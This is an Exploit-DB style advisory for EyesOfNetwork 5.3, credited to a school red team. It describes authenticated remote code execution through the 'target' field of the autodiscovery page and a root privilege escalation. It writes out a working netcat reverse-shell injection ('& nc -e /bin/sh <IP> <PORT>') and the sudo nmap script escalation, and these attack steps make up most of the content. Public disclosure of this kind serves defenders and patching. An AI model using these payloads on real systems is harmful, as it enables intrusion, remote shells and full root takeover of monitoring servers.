EyesOfNetwork 5.3 - RCE & PrivEsc

vendor:

EyesOfNetwork

by:

Audencia Business SCHOOL Red Team

9.8

CVSS

HIGH

Authentified Romote Code Execution flaw

N/A

CWE

Product Name: EyesOfNetwork

Affected Version From: 5.3

Affected Version To: 5.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2021

EyesOfNetwork 5.3 – RCE & PrivEsc

An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.

Mitigation:

Restrict access to the /autodiscover.php page and ensure that user input is properly validated.

Source

Exploit-DB raw data:

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

#Authentified Romote Code Execution flaw > remote shell > PrivEsc
#
#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.

==============================================
Initial RCE

In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like : 

& nc -e /bin/sh <IP> <PORT>
==============================================
PrivEsc

The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :
 
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script